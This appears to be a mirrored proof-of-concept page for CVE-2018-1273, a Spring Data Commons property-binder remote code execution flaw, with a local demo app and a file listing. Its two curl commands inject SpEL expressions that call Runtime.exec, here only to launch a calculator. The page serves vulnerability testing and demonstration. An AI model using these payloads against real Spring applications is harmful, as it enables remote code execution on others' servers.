关联漏洞
描述
POC for CVE-2018-1273
介绍
# CVE-2018-1273
Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.
More information [here](https://pivotal.io/security/cve-2018-1273)
# Running
The application can be tested with the vulnerable version or the fixed version of Spring Data Commons.
* Vulnerable version (by default):
```
mvn spring-boot:run
```
* Fixed version:
```
mvn spring-boot:run -Dfixed
```
# Testing the vulnerability
Run the following command to check if the vulnerability can be exploited:
* On Windows:
```
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
```
* On MacOs:
```
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
```
# Credits
Created by https://www.arima.eu

文件快照
[4.0K] /data/pocs/c85636400ff2f9636596b13075ac176a6e9e77e4
├── [ 11K] LICENSE
├── [6.3K] mvnw
├── [4.9K] mvnw.cmd
├── [2.1K] pom.xml
├── [1.3K] README.md
└── [4.0K] src
├── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] eu
│ │ └── [4.0K] arima
│ │ └── [4.0K] poccve20181273
│ │ ├── [ 331] PocCve20181273Application.java
│ │ └── [ 548] VulnerableController.java
│ └── [4.0K] resources
│ └── [ 0] application.properties
└── [4.0K] test
└── [4.0K] java
└── [4.0K] eu
└── [4.0K] arima
└── [4.0K] poccve20181273
└── [ 348] PocCve20181273ApplicationTests.java
12 directories, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。